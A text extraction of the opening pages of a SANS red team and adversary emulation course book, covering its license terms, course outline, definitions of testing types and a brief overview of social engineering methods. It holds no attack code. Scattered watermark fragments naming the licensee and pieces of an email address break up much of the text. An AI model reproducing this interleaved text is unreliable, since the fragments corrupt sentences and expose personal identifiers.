SANS - SEC564 RED Team Exercises and Adversary Emulation 2020

415 Pages • 103,492 Words • PDF • 53.4 MB
+ exercises + Adversary + Team + Sans + Emulation
Uploaded at 2021-09-24 05:59
Report DMCA

This document was submitted by our user and they confirm that they have the consent to share it. Assuming that you are writer or own the copyright of this document, report to us by using this DMCA report button.


PREVIEW PDF
© SANS Institute 2020

SEC564 | RED TEAM EXERCISES AND ADVERSARY EMULATION

090aff33bcb6e401ded410120bc9a268

564.1

i< an

nm

ak

er

@ ya

ho

o.

co

m

>

Ap ril

26 ,2 02 0

Introduction [email protected] and Planning of Red22829180 Team Exercises

Li nc

ol

n

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live THE MOST TRUSTED SOURCE FOR INFORMATION SECURITY TRAINING, CERTIFICATION, AND RESEARCH | sans.org

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020

Copyright © 2020 Jorge Orchilles. All rights reserved to Jorge Orchilles and/or SANS Institute.

PLEASE READ THE TERMS AND CONDITIONS OF THIS COURSEWARE LICENSE AGREEMENT ("CLA") CAREFULLY BEFORE USING ANY OF THE COURSEWARE ASSOCIATED WITH THE SANS COURSE. THIS IS A LEGAL AND ENFORCEABLE CONTRACT BETWEEN YOU (THE “USER”) AND SANS INSTITUTE FOR THE COURSEWARE. YOU AGREE THAT THIS AGREEMENT IS ENFORCEABLE LIKE ANY WRITTEN NEGOTIATED AGREEMENT SIGNED BY YOU.

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

With the CLA, SANS Institute hereby grants User a personal, non-exclusive license to use the Courseware subject to the terms of this agreement. Courseware includes all printed materials, including course books and lab workbooks, as well as any digital or other media, virtual machines, and/or data sets distributed by SANS Institute to User for use in the SANS class associated with the Courseware. User agrees that the CLA is the complete and exclusive statement of agreement between SANS Institute and you and that this CLA supersedes any oral or written proposal, agreement or other communication relating to the subject matter of this CLA.

[email protected] o.

co

m

>

Ap ril

BY ACCEPTING THIS COURSEWARE, YOU AGREE TO BE BOUND BY THE TERMS OF THIS CLA. BY ACCEPTING THIS SOFTWARE, YOU AGREE THAT ANY BREACH OF THE TERMS OF THIS CLA MAY CAUSE IRREPARABLE HARM AND SIGNIFICANT INJURY TO SANS INSTITUTE, AND THAT SANS INSTITUTE MAY ENFORCE THESE PROVISIONS BY INJUNCTION (WITHOUT THE NECESSITY OF POSTING BOND) SPECIFIC PERFORMANCE, OR OTHER EQUITABLE RELIEF. If you do not agree, you may return the Courseware to SANS Institute for a full refund, if applicable.

ho

22829180 nm

ak

er

@ ya

User may not copy, reproduce, re-publish, distribute, display, modify or create derivative works based upon all or any portion of the Courseware, in any medium whether printed, electronic or otherwise, for any purpose, without the express prior written consent of SANS Institute. Additionally, User may not sell, rent, lease, trade, or otherwise transfer the Courseware in any way, shape, or form without the express written consent of SANS Institute.

i< an

If any provision of this CLA is declared unenforceable in any jurisdiction, then such provision shall be deemed to be severable from this CLA and shall not affect the remainder thereof. An amendment or addendum to this CLA may accompany this Courseware.

az

ze

Lincoln Mazzei nc o

ln

M

SANS acknowledges that any and all software and/or tools, graphics, images, tables, charts or graphs presented in this Courseware are the sole property of their respective trademark/registered/copyright owners, including: AirDrop, AirPort, AirPort Time Capsule, Apple, Apple Remote Desktop, Apple TV, App Nap, Back to My Mac, Boot Camp, Cocoa, FaceTime, FileVault, Finder, FireWire, FireWire logo, iCal, iChat, iLife, iMac, iMessage, iPad, iPad Air, iPad Mini, iPhone, iPhoto, iPod, iPod classic, iPod shuffle, iPod nano, iPod touch, iTunes, iTunes logo, iWork, Keychain, Keynote, Mac, Mac Logo, MacBook, MacBook Air, MacBook Pro, Macintosh, Mac OS, Mac Pro, Numbers, OS X, Pages, Passbook, Retina, Safari, Siri, Spaces, Spotlight, There’s an app for that, Time Capsule, Time Machine, Touch ID, Xcode, Xserve, App Store, and iCloud are registered trademarks of Apple Inc.

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK PMP and PMBOK are registered marks of PMI.

live

SOF-ELK® is a registered trademark of Lewes Technology Consulting, LLC. Used with permission. SIFT® is a registered trademark of Harbingers, LLC. Used with permission. Governing Law: This Agreement shall be governed by the laws of the State of Maryland, USA.

SEC564_1_F01_01

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 SEC564.1

Red Team Exercises and Adversary Emulation

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

Introduction and Planning of Red Team Exercises co

m

>

Ap ril

[email protected] o.

© 2020 Jorge Orchilles | All Rights Reserved | Version F01_01

ak

er

@ ya

ho

22829180 i< an

nm

Hello and welcome to SANS Security 564 Red Team Exercises and Adversary Emulation! We have an exciting two days planned for you involving both courseware and hands-on labs to fortify what you learn. We will be discussing Red Team Exercises and Adversary Emulation to bring the most value to the target organization without introducing risk. We will also be performing a class-long, hands-on Threat Intelligence led Adversary Emulation that will push you to think like an adversary and try many different tactics, techniques, and procedures to achieve the objective.

M

az

ze

Lincoln Mazzei nc o

ln

Let’s keep these sessions interactive. If you have questions, let the instructor know. Red Team tradecraft is continuously evolving and your contribution to the class is welcome. Discussions about these relevant topics are incredibly important as student bring a variety of skill levels to class. The instructor does reserve the right, however, to take conversations offline during a break or outside of class in the interest of time.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

This course was prepared and reviewed by industry leaders with many years of experience in Red Team Exercises, Adversary Emulations, Threat Intelligence, Security Operations, Hunt Teaming, and forensics. Thank you to everyone in the community that has contributed to the industry. I tried very hard to give credit to every developer, contributor, or author of frameworks, tools, and scripts mentioned in this course. Thank you for your contributions and allowing others to learn from them!

SANS and Jorge Orchilles would like to thank and acknowledge Joe Vest and James Tubberville for their contributions to the education of the Red Team Community. Without their extensive efforts, pioneering of critical concepts, and dedication to Red teaming, the Community and industry would not have been able to evolve to where it is today.

live

Special thanks to Carlos Vendramini, Rob Lee, Katie Nickels, Moses Frost, Tim Medin, Erik Van Buggenhout, Jim Shewmaker, Tim Wainwright (and the VECTR development team), and my longtime SANS mentors Ed Skoudis and Stephen Sims. You are all rock stars! This course is dedicated to my beautiful wife and daughter, Danielle and Beatriz.

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

1

© SANS Institute 2020 I sincerely hope you enjoy and can leverage this information as soon as possible! Please do not hesitate to contact me at [email protected] or @jorgeorchilles

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

- Jorge Orchilles

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

2

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Table of Contents

Page

About the Course

6

Defining Terms

8

090aff33bcb6e401ded410120bc9a268 18

Frameworks and Methodologies

27

26 ,2 02 0

Motivation and Introduction

Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning

[email protected] Ap ril

Roles and Responsibilities

>

Rules of Engagement

m

Attack Infrastructure

58 60 70 77 85 93

o.

co

Lab 1.2: Attack Infrastructure

42

SEC564 | Red Team Exercises and Adversary Emulation

3

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

3

© SANS Institute 2020 Table of Contents

Page

Exercise Execution

106

Reconnaissance

108

Social Engineering

117

Lab 1.3: Recon and Social Engineering

121

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 Weaponization Delivery

[email protected]

Lab 1.4: C2 and Weaponization

142 146 148

o.

co

m

>

Ap ril

Conclusion for 564.1

123

SEC564 | Red Team Exercises and Adversary Emulation

4

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

4

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

5

ak

er

@ ya

ho

22829180 i< an

nm

This slide shows the SANS Penetration Testing Curriculum, offering a variety of courses all focused on helping organizations improve their security.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

5

© SANS Institute 2020 About the Course (1)

090aff33bcb6e401ded410120bc9a268 Welcome to SANS SEC564, Red Team Exercises and Adversary 26 ,2 02 0

Emulation! • Learn the skills needed to perform safe, professional Red Team Exercises and Adversary Emulations • Introduce and follow repeatable frameworks and methodologies • Tips and tricks to save time, enhance quality, and avoid risk • Perform hands-on exercises to reinforce the topics, in a classlong, intelligence led, Adversary Emulation Red Team Exercise

o.

co

m

>

Ap ril

[email protected]

SEC564 | Red Team Exercises and Adversary Emulation

6

ak

er

@ ya

ho

22829180 i< an

nm

About the Course (1) Welcome to SANS SEC564, Red Team Exercises and Adversary Emulation! We have an exciting two days planned for you involving both courseware and hands-on labs to fortify what you learn. We will be discussing Red Team Exercises and Adversary Emulation to bring the most value to the target organization without introducing risk. We will also be performing a class-long, hands-on Threat Intelligence led Adversary Emulation that will push you to think like an adversary and try many different tactics, techniques, and procedures to achieve the objective.

M

az

ze

Lincoln Mazzei nc o

ln

Let’s get started!

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

6

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 About the Course (2)

of Red Team Exercises • 564.2: Red Team Exercise Execution and Closure

Closure

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 • 564.1: Introduction and Planning Threat Intelligence

Ap ril

[email protected] Planning

o.

co

m

>

Testing

SEC564 | Red Team Exercises and Adversary Emulation

7

ak

er

@ ya

ho

22829180 i< an

nm

About the Course (2) 564.1 Day 1 begins by introducing you to Red Team Exercises and Adversary Emulations to show how they differ from other security testing types such as vulnerability assessments, penetration tests, and purple teaming. You will be introduced to a number of industry frameworks (including the Cyber Kill Chain, Unified Kill Chain, and MITRE ATT&CK among others) for Red Team Exercises and Adversary Emulations, followed by the hybrid approach the class will follow. Threat Intelligence is a main factor and trigger to performing Red Team Exercises and will be covered early in the class. A successful Red Teamer needs to know how to obtain and consume threat intelligence to successfully plan and execute an Adversary Emulation. Red Team Exercises require substantial planning and you will learn what triggers an exercise, defining objectives and scope, setting up attack infrastructure, understand roles and responsibilities including those of the Trusted Agents (White Team or Cell), and establishing the rules of engagement. With a strong plan, the exercise execution phase may begin. You will learn how to perform the steps to emulate an adversary and provide a high value Red Team Exercise for the next half of the class. We will cover Reconnaissance, Social Engineering, Weaponization, and Delivery. Day 1 concludes with a lab testing your payload and attack infrastructure.

nc o

ln

M

az

ze

Lincoln Mazzei

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

564.2 Day 2 continues with Red Team Exercise execution and wraps up with Exercise Closure activities. The day is filled with exercises that walk students through the class-long Adversary Emulation Red Team Exercise. Multiple Red Team Exercises phases are explored that use realistic TTPs to ultimately meet the emulated adversary objective. During the exercises, you gain initial access, perform discovery of the target network from patient zero, attempt privilege escalation, create advanced command and controls channels, and establish persistence. These exercises reinforce the lecture portion of the class. You will learn various methods for defense evasion and execution, credentials access, and lateral movement and pivoting techniques to then perform them in the exercises and obtain the emulated adversary’s objective. Lastly, you will complete the exercise by performing various closure activities that are discussed.

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

7

© SANS Institute 2020 Course Roadmap

Defining Terms

090aff33bcb6e401ded410120bc9a268 Defining Terms Motivation and Introduction Frameworks and Methodologies Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning Roles and Responsibilities Rules of Engagement Attack Infrastructure Lab 1.2: Attack Infrastructure Exercise Execution Reconnaissance Social Engineering Lab 1.3: Recon and Social Engineering Weaponization Delivery Lab 1.4: C2 and Weaponization

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

8

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

8

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Defining Terms

090aff33bcb6e401ded410120bc9a268 There are many terms in offensive information security: 26 ,2 02 0

Ethical Hacking Vulnerability Scanning Vulnerability Assessment Penetration Testing Red Team Adversary Emulation Purple Team

co

m

>

Ap ril

[email protected] o.

• • • • • • •

SEC564 | Red Team Exercises and Adversary Emulation

9

ak

er

@ ya

ho

22829180 i< an

nm

Defining Terms There are many terms in offensive information security that many information security practitioners, technologists, managers, regulators, and/or auditors use interchangeably to mean various types of assessments. This results in a lot of confusion.

ze

Lincoln Mazzei ln

Ethical hacking Vulnerability Scanning Vulnerability Assessment Penetration testing Red Team Adversary Emulation Purple Team

nc o

• • • • • • •

M

az

The following terms are associated with what an offensive information security professional performs and will be defined in this section to ensure we are all using the terms correctly:

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

9

© SANS Institute 2020 Ethical Hacking

090aff33bcb6e401ded410120bc9a268 “Hacker” and “Hacking” can mean many things 26 ,2 02 0

• A hacker is a skilled individual who uses their technical knowledge to overcome a problem • Permission differentiates between ethical and sinister, often called White Hat and Black Hat respectively • An Ethical Hacker is a person who hacks into a computer network in order to test or evaluate its security, rather than with malicious or criminal intent

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

10

ak

er

@ ya

ho

22829180 i< an

nm

Ethical Hacking The term “hacker” and “hacking” has many meanings, depending on who you ask. A hacker is a skilled individual who uses their technical knowledge to overcome a problem. Permission often differentiates between ethical or sinister, often called White Hat and Black Hat respectively. An Ethical Hacker is a person who hacks into a computer network in order to test or evaluate its security, rather than with malicious or criminal intent, with the goal of improving security.

az

ze

Lincoln Mazzei nc o

ln

M

An early reference to hackers was in the late 1950s and early 1960s around the Massachusetts Institute of Technology (MIT) Tech Model Railroad Club. Steven Levy’s Hackers: Heroes of the Computer Revolution takes a deeper look at the origins of the terms, “hackers” and “hacking” but the overall conclusion is individuals who understand technology and try to modify it for their personal gain or problem solving. The media will often refer to hackers as the malicious or sinister type that break into computer systems and networks without permission, often for monetary gain. While those are hackers as well, that does not mean all hackers are malicious.

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To distance professional information security practitioners that perform assessments on systems and networks, the term ethical hacker began to be used. Ethical Hackers are hired to test the security of various assets, based on the scope and with rules of engagements, to identify flaws and remediate them to improve the overall security posture. Ethical Hacking covers a number of different types of security assessments, from vulnerability scanning to penetration testing to Red Teamings and Purple Teaming. These will be covered in the following pages. Reference: https://en.wikipedia.org/wiki/Hacker

10

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Vulnerability Scanning

090aff33bcb6e401ded410120bc9a268 • •

Definition: Automated (tool-based) scanning against assets (IPs or applications). Goal: Identify low hanging, known vulnerabilities pre, or postauthentication.

26 ,2 02 0



Effort: Small; requires tool investment

[email protected] co

m

>

Focus: Technology vulnerabilities, patches, configuration Frequency: Weekly to Monthly Customer: System owners and operations teams

o.

• • •

Ap ril

– Many vendors: Tenable Nessus, Rapid7 Nexpose, Qualys, AlientVault, IBM AppScan, HP WebInspect, etc.

SEC564 | Red Team Exercises and Adversary Emulation

11

ak

er

@ ya

ho

22829180 i< an

nm

Vulnerability Scanning Vulnerability Scanning is the most basic of security assessments that fall within the ethical hacking bucket. Vulnerability scanning means running an automated, tool-based scan against an asset (application, infrastructure, IP Address, etc.). The overall goal of vulnerability scanning is to learn more about targets and find openings by interacting with the target environment.

az

ze

Lincoln Mazzei nc o

ln

M

Performing vulnerability scanning may result in network addresses of live hosts, firewalls, routers, applications, and other assets on a network. With a list of assets, one can determine the network topology of the environment, operating systems, open ports, services, applications, configurations, and potential vulnerabilities. Vulnerability scanning is generally always tool based; there are many vulnerability scanning tools available: Tenable Nessus, Rapid7 Nexpose, Qualys, AlientVault, IBM AppScan, HP WebInspect, etc. These tools can perform both authenticated and non-authenticated scanning if credentials are provided or an agent is running on the target asset. Vulnerability scanning is generally scheduled to reoccur frequently and provides reports of vulnerabilities to target customers. As automated scans are signature based or benchmark based, they may result in a number of false positives, particularly when authentication or agents are not leveraged.

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

SANS Course: SEC460: Enterprise Threat and Vulnerability Assessment https://www.sans.org/course/enterprise-threat-vulnerability-assessment

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

11

© SANS Institute 2020 Vulnerability Assessments

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

[email protected] o.

co

• •

Effort: ~30% tools based and ~70% manual testing Focus: Assessments are broader and often include explicit policy and procedure reviews. Frequency: Once per year or once per certification of product/version Customer: System owners, operations, engineers, application stakeholders

Ap ril

• •

>



Definition: Automated and manual assessment of assets in scope to find security vulnerabilities, which may or may not be used to get in or steal data. Goal: Identify ALL vulnerabilities from assess in scope.

m



SEC564 | Red Team Exercises and Adversary Emulation

12

ak

er

@ ya

ho

22829180 i< an

nm

Vulnerability Assessments According to the NIST, Vulnerability Assessment is a ”Systematic examination of an information system or product to determine the adequacy of security measures, identify security deficiencies, provide data from which to predict the effectiveness of proposed security measures, and confirm the adequacy of such measures after implementation.”

ze

Lincoln Mazzei nc o

ln

M

az

Vulnerability assessments are focused on finding all vulnerabilities on the assets in scope without exploiting the vulnerabilities. These assessments often include benchmark comparisons, policy, configuration, and procedure reviews. Vulnerabilities are often verified by the analyst but not exploited. This leads to the main difference between a vulnerability and a penetration: The exploitation of a vulnerability is not performed during a vulnerability assessment.

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ns

ed

To :

Li

Vulnerability assessments provide more value than a vulnerability scan because an analyst is verifying the vulnerabilities and therefore not reporting false positives. The analyst can also properly rate the risk of the vulnerability as opposed to using the default risk rating provided by the vulnerability scanning tool. This leads to a more resource intensive assessment due to the manual verification and the modifications to the report.

Li

ce

SANS Course: SEC460: Enterprise Threat and Vulnerability Assessment https://www.sans.org/course/enterprise-threat-vulnerability-assessment

live

Reference: https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-30r1.pdf

12

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Penetration Testing

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

[email protected] >

Ap ril

Effort: ~10% tools based and ~90% manual testing Frequency: ~once per year Customer: System owners, operations, engineering, and application stakeholders

o.

• • •

m



Definition: Penetration testing involves modeling the techniques used by real-world computer attackers to find vulnerabilities; to exploit those flaws under controlled circumstances; in a professional, safe manner according to a carefully designed scope and Rules of Engagement; to determine business risk and potential impact, all with the goal of helping the organization improve security practices. – SEC560 Goal: Report all exploitable vulnerabilities under controlled circumstances.

co



SEC564 | Red Team Exercises and Adversary Emulation

13

ak

er

@ ya

ho

22829180 i< an

nm

Penetration Testing A formal definition of penetration testing from SANS560 Network Penetration Testing & Ethical Hacking course: Penetration testing involves modeling the techniques used by real-world computer attackers to find vulnerabilities, and, under controlled circumstances, to exploit those flaws in a professional, safe manner according to a carefully designed scope and rules of engagement to determine business risk and potential impact all with the goal of helping the organization improve security practices.

az

ze

Lincoln Mazzei nc o

ln

M

The main difference between a vulnerability assessment and a penetration test is that in a penetration test, one is exploiting the vulnerability not just verifying its existence. Penetration Tests generally have a more limited scope confining the tester to certain IP Addresses, network range, or web application.

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

Li

SANS Course: SEC560: Network Penetration Testing and Ethical Hacking: https://www.sans.org/course/network-penetrationtesting-ethical-hacking SEC660: Advanced Penetration Testing, Exploit Writing, and Ethical Hacking: https://www.sans.org/course/advanced-penetration-testing-exploits-ethical-hacking SEC542: Web App Penetration Testing and Ethical Hacking: https://www.sans.org/course/web-app-penetrationtesting-ethical-hacking SEC642: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques: https://www.sans.org/course/advanced-web-app-penetration-testing-ethical-hacking

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

13

© SANS Institute 2020 Red Team

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

[email protected] o.

co

m

• • •

Ap ril



Definition: Red Team emulates Tactics, Techniques, and Procedures (TTPs) of real adversaries to improve the people, processes, and technology in the target environment. “The practice of looking at a problem or situation from the perspective of an adversary” – Red Team Journal 1997 Goal: Make Blue Team better. Train and measure blue teams' detection and response policies, procedures, and technologies are effective. Effort: Manual; some Red Team Automation tools Frequency: Intelligence-led (new exploit, tool, or TTP) Customer: Blue Teams

>



SEC564 | Red Team Exercises and Adversary Emulation

14

ak

er

@ ya

ho

22829180 i< an

nm

Red Team According to the Red Team Journal, the definition of Red Team is “the practice of looking at a problem or situation from the perspective of an adversary”. In Information Security, the Red Team emulates Tactics, Techniques, and Procedures (TTPs) of real adversaries to improve the people, processes, and technology in the target environment.

az

ze

Lincoln Mazzei nc o

ln

M

Red Team performs the same Tactics, Techniques and Procedures (TTPs) as real adversaries, against live production infrastructure, without the foreknowledge of the Blue Team. Red Team tests security detection and response capabilities, and helps identify production vulnerabilities, configuration errors, invalid assumptions or other security issues in a controlled manner. Every Red Team breach is followed by full disclosure between the Red Team and Blue Team to identify gaps, address findings and significantly improve breach response.

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ns

ed

To :

Red Team differentiates from penetration testing in that the customer is the Blue Team. The goal of Red Team is to make Blue Team better. This is done by emulating adversary tactics, techniques, and procedures to measure the detection and response of the blue team.

Li

ce

References: https://en.wikipedia.org/wiki/Red_team https://redteamjournal.com/blog/2018/11/climbing-the-red-teaming-ladder

live

14

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Blue Team

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

[email protected] o.

co

m

>

• • • •

Definition: the defenders in an organization entrusted with identifying and remediating attacks. Generally associated with Security Operations Center or Managed Security Service Provider (MSSP), Hunt Team, Incident Response, and Digital Forensics. Really, it is everyone's responsibility! Goal: identify, report the attack, contain, and eradicate attacks Effort: Automated and Manual. People are the best defenders Frequency: Every Day 24/7 Customer: entire organization

Ap ril



SEC564 | Red Team Exercises and Adversary Emulation

15

ak

er

@ ya

ho

22829180 i< an

nm

Blue Team Everyone in an organization can be considered part of the Blue Team (or defenders). From the Human Resources staff vetting new candidates before they begin working at the organization, to the analyst that identifies and reports phishing attempts. The social engineering portion of most Red Team exercises will focus on training the Blue Team that is considered non-security staff. Most mention of Blue Team infer Security Operations Center analysts who spend their time monitoring and defending a network. While they are the main Blue Team, everyone in the organization should be considered part of the Blue Team and a defender of the organization. Red Team exercises train the Security Operations Center analysts, Hunt team, Incident Response, Incident Management, and Forensic analysts the most.

nc o

ln

M

az

ze

Lincoln Mazzei

References: https://en.wikipedia.org/wiki/Blue_team_(computer_security)

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

15

© SANS Institute 2020 Adversary Emulation

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

[email protected] >

Ap ril

Effort: Manual; more setup than a limited scope Penetration Test Frequency: Twice a year or yearly Customer: Entire organization

o.

• • •

m



Definition: A type of Red Team exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective similar to those of realistic threats or adversaries. Goal: Emulate an end-to-end attack against a target organization. Obtain a holistic view of the organization’s preparedness for a real, sophisticated attack.

co



SEC564 | Red Team Exercises and Adversary Emulation

16

ak

er

@ ya

ho

22829180 i< an

nm

Adversary Emulation An Adversary Emulation is a type of Red Team Exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective (similar to those of realistic threats or adversaries). Adversary emulations are performed using a structured approach, which can be based on a kill chain or attack flow. Methodologies and Frameworks for Adversary Emulations will be covered shortly.

az

ze

Lincoln Mazzei ln

M

Adversary emulations test emulate an end-to-end attack against a target organization to obtain a holistic view of the organization’s preparedness for a real, sophisticated attack.

nc o

This will be the main focus of SEC564 Red Team Exercises and Adversary Emulation.

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

To :

Li

Reference: https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1571685484.pdf https://lockboxx.blogspot.com/2019/08/apt-emulation-theory.html

live

16

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Purple Team

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

[email protected] >

Ap ril

Effort: Manual Frequency: Intelligence-led (new exploit, tool, or TTP) Customer: Red Team & Blue Team

o.

• • •

m



Definition: A function, or virtual team, where red and blue work together to improve the overall security of the organization. Red Team does not focus on stealth as they normally would. Goal: Red Team emulates adversary TTPs while blue teams watch and improve detection and response policies, procedures, and technologies in real time.

co



SEC564 | Red Team Exercises and Adversary Emulation

17

ak

er

@ ya

ho

22829180 i< an

nm

Purple Team Purple Teaming is a function or process, not an individual team, where the Red and Blue Teams work together. While many Red Team Exercises and Adversary Emulations are performed “blind” from the Blue Team perspective, Purple Team engagements are fully known and performed together with the Blue Team.

ze

Lincoln Mazzei ln

M

az

Purple Teaming can be done similar to a blind Red Team Adversary Emulation exercise, often called a “replay” or ad-hoc based on new intelligence obtained, such as a new exploit, tools, or TTP that were released or made public/known by the organization.

nc o

SANS Course: SEC599: Defeating Advanced Adversaries - Purple Team Tactics & Kill Chain Defenses: https://www.sans.org/course/defeating-advanced-adversaries-kill-chain-defenses SEC699: Advanced Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection: https://www.sans.org/course/purple-team-tactics-adversary-emulation

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

Reference: https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1571685484.pdf https://danielmiessler.com/study/purple-team/

live

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

17

© SANS Institute 2020 Course Roadmap

Motivation and Introduction

090aff33bcb6e401ded410120bc9a268 Defining Terms Motivation and Introduction Frameworks and Methodologies Threat Intelligence Lab 1.1: Consuming Threat Intelligence Planning Roles and Responsibilities Rules of Engagement Attack Infrastructure Lab 1.2: Attack Infrastructure Exercise Execution Reconnaissance Social Engineering Lab 1.3: Recon and Social Engineering Weaponization Delivery Lab 1.4: C2 and Weaponization

26 ,2 02 0

• Day 1: Introduction and Planning of Red Team Exercises • Day 2: Red Team Exercise Execution and Closure

o.

co

m

>

Ap ril

[email protected] SEC564 | Red Team Exercises and Adversary Emulation

18

ak

er

@ ya

ho

22829180 i< an

nm

This page intentionally left blank.

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

18

© 2020 Jorge Orchilles

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Introduction to Red Team

090aff33bcb6e401ded410120bc9a268 What is Red Team? 26 ,2 02 0

• The practice of looking at a problem or situation from the perspective of an adversary • In Information Security, it is applied in various formats

[email protected] o.

co

m

>

Ap ril

• Adversary Emulation (our focus in this class) – Understand the adversary and emulate the TTPs • Social engineering • Tabletop Exercises / Wargaming – Non-Technical – Adversary Simulation

SEC564 | Red Team Exercises and Adversary Emulation

19

ak

er

@ ya

ho

22829180 i< an

nm

Introduction to Red Team According to Red Team Journal, the definition of Red Team is “the practice of looking at a problem or situation from the perspective of an adversary”. In Information Security, the Red Team emulates Tactics, Techniques, and Procedures (TTPs) of real adversaries to improve the people, processes, and technology in the target environment. This is done through various Red Team Exercises and can be delivered in various methods. Below are a few:

M

nc o



Adversary Emulations: Full-scale, end-to-end, operation against production targets—the most realistic attack an organization can endure outside of an attack from a real adversary. Social Engineering: Attacking the human through various methods. • Email: Phishing is the most common form of social engineering to obtain access to a target organization. Will be covered more later. • Telephone: Voice phishing or vishing, calling the target and obtaining information through the phone. Can include SMS messages (texting). • Physical attack: For example, carrying a box and having someone hold the door open for you without verifying access, or obtaining access to a physical asset by manipulating others to allow the access. Tabletop Exercise or Wargaming: An activity where key people (often senior managers) walk through a simulated situation to answer "what if" questions. During a tabletop, real testing does not occur. Discussions of potential outcomes are explored and examined. This is a non-technical exercise often called an Adversary Simulation.

ln



az

ze

Lincoln Mazzei

ns

Li

ce



ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

